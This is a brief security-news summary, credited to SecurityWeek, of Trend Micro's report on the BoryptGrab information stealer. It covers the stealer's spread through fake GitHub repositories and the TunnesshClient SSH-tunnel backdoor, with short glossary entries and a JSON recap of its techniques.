Over 100 GitHub repositories have been found distributing a new information stealer known as BoryptGrab, according to Trend Micro’s report. This malware is designed to harvest sensitive data from browsers and cryptocurrency wallets, alongside various system files. Since late 2025, the malware has been packaged within ZIP archives that disguise themselves as free software tools, highlighting a trend where attackers exploit SEO-optimized GitHub repositories to deliver malware disguised as legitimate tools. Notably, certain versions of BoryptGrab include the TunnesshClient backdoor, which enables remote command execution through SSH tunneling, further complicating the threat landscape as it allows attackers to operate with increased sophistication.
BoryptGrab: BoryptGrab is a C/C++ information stealer malware targeting Windows systems with VM detection, anti-analysis checks, and elevated privilege attempts. It extracts data from numerous browsers using Chrome encryption techniques, cryptocurrency wallets, browser extensions, system details, screenshots, and files from Telegram and Discord. The stealer has been spread since late 2025 via fake GitHub repositories masquerading as software tools.
Trend Micro: Trend Micro is a global cybersecurity company specializing in threat intelligence, detection solutions, and research on evolving cyber threats. It recently published predictions for 2026 highlighting industrialized cybercrime and AI-driven scams. In this case, Trend Micro investigated and reported on the BoryptGrab stealer distributed through deceptive GitHub repositories.
TunnesshClient: TunnesshClient is a Python-based backdoor that uses reverse SSH tunnels for stealthy command-and-control communication. It acts as a SOCKS5 proxy, executes shell commands, manages files, and transfers folders to the attacker’s server. Deployed by certain BoryptGrab variants, it provides persistent remote access in this campaign.
`json
{
“Stealer Techniques”: “Harbors browser data through Chromium helpers and targets wallet extensions with exfiltration to servers controlled by attackers.”,
“Distribution Tactics”: “Attackers distribute the malware via deceptive download pages and GitHub repositories, disguising it as legitimate software tools.”,
“Backdoor Capabilities”: “TunnesshClient facilitates proxying traffic, remote file operations, and command execution using SSH tunneling.”
}
`
Source: SecurityWeek
